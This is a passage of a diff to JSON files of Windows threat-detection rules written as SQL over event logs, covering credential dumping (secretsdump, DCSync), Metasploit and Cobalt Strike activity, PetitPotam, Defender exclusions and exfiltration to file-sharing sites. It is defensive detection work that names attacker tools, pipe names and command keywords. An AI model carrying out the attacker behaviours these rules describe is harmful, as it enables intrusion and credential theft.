"id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", "status": "experimental", - "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "False positives should be very low with the extensions list cited. 
Especially if you don't heavily utilize OneNote.", - "Occasional FPs might occur if OneNote is used internally to share different embedded documents" + "If source account name is not an admin then its super suspicious" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_office_onenote_susp_dropped_files.yml" + "filename": "win_security_account_discovery.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", - "id": 
"ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", - "status": "test", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S", + "title": "Possible Impacket SecretDump Remote Activity", + "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", + "status": "experimental", + "description": "Detect AD credential dumping using impacket secretdump HKTL", + "author": "Samir Bousseaden, wagga", "tags": [ "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' 
AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" ], - "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "win_security_impacket_secretdump.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - File", - "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", + "title": "Metasploit SMB Authentication", + "id": "72124974-a68b-4366-b990-d30e0b2a190d", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Alerts on Metasploit host's authentications on the domain.", + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Linux hostnames composed of 16 characters." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" ], - "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "win_security_metasploit_authentication.yml" }, { - "title": "Unusual File Modification by dns.exe", - "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "title": "Possible Shadow Credentials Added", + "id": "f598ea0c-c25a-4f72-a219-50c44411c791", "status": "experimental", - "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "description": "Detects possible addition of shadow credentials to an active directory object.", + "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.credential_access", + "attack.t1556" ], "falsepositives": [ - "Unknown" + "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. 
(From elastic FP section)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" ], - "filename": "file_change_win_unusual_modification_by_dns_exe.yml" + "filename": "win_security_susp_possible_shadow_credentials_added.yml" }, { - "title": "File Creation Date Changed to Another Year", - "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", + "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", + "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", "status": "experimental", - "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.t1070.006", - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Changes made to or by the local NTP service" + "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND 
NOT (((Image LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" ], - "filename": "file_change_win_2022_timestomping.yml" + "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" }, { - "title": "Potential PrintNightmare Exploitation Attempt", - "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "title": "Possible PetitPotam Coerce Authentication Attempt", + "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", "status": "experimental", - "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", - "author": "Bhabesh Raj", + "description": "Detect PetitPotam coerced authentication activity.", + "author": "Mauricio Velazco, Michael Haag", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.credential_access", + "attack.t1187" ], "falsepositives": [ - "Unknown" + "Unknown. Feedback welcomed." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" ], - "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" + "filename": "win_security_petitpotam_network_share.yml" }, { - "title": "Unusual File Deletion by Dns.exe", - "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "title": "Suspicious Scheduled Task Update", + "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", "status": "experimental", - "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "description": "Detects update to a scheduled task event that contain suspicious keywords.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE 
'%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" + "filename": "win_security_susp_scheduled_task_update.yml" }, { - "title": "Prefetch File Deleted", - "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", - "status": "experimental", - "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", - "author": "Cedric MAURUGEON", + "title": "Windows Defender Exclusion Set", + "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "status": "test", + "description": "Detects scenarios where an windows defender exclusion 
was added in registry where an entity would want to bypass antivirus scanning from windows defender", + "author": "@BarryShooshooga", "tags": [ "attack.defense_evasion", - "attack.t1070.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Intended inclusions by administrator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" ], - "filename": "file_delete_win_delete_prefetch.yml" + "filename": "win_security_defender_bypass.yml" }, { - "title": "Exchange PowerShell Cmdlet History Deleted", - "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", + "id": "2c99737c-585d-4431-b61a-c911d86ff32f", "status": "experimental", - "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", + "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "falsepositives": [ + "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if 
it's a regular user or DC computer account." + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" + ], + "filename": "win_security_account_backdoor_dcsync_rights.yml" + }, + { + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", + "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Possible FP during log rotation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "file_delete_win_delete_exchange_powershell_logs.yml" + "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" } ] 
diff --git a/rules/rules_windows_sysmon_full.json b/rules/rules_windows_sysmon_full.json index 30b7200..64267d7 100644 --- a/rules/rules_windows_sysmon_full.json +++ b/rules/rules_windows_sysmon_full.json 
@@ -1,710 +1,731 @@ [ { - "title": "DNS Query for MEGA.io Upload Domain - DNS Client", - "id": "66474410-b883-415f-9f8d-75345a0a66a6", + "title": "Malicious Named Pipe", + "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe used by known APT malware", + "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName 
LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\'))" ], - "filename": "win_dns_client_mega_nz.yml" + "filename": "pipe_created_mal_namedpipes.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", - "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "title": "CobaltStrike Named Pipe Pattern Regex", + "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR 
PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,'))" ], - "filename": "win_dns_client__mal_cobaltstrike.yml" + "filename": "pipe_created_mal_cobaltstrike_re.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - DNS Client", - "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", - "status": "experimental", - "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "ADFS Database Named Pipe Connection", + "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", + "status": "test", + "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Processes in the filter condition" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR Image LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR Image LIKE '%\\\\tssdis.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "win_dns_client_anonymfiles_com.yml" + "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - DNS Client", - "id": "090ffaad-c01a-4879-850c-6d57da98452d", - "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Named Pipes", + "id": "739915e4-1e70-4778-8b8a-17db02f66db1", + "status": "test", + "description": "Detects a named pipe used by Turla group samples", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.g0010", + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE 
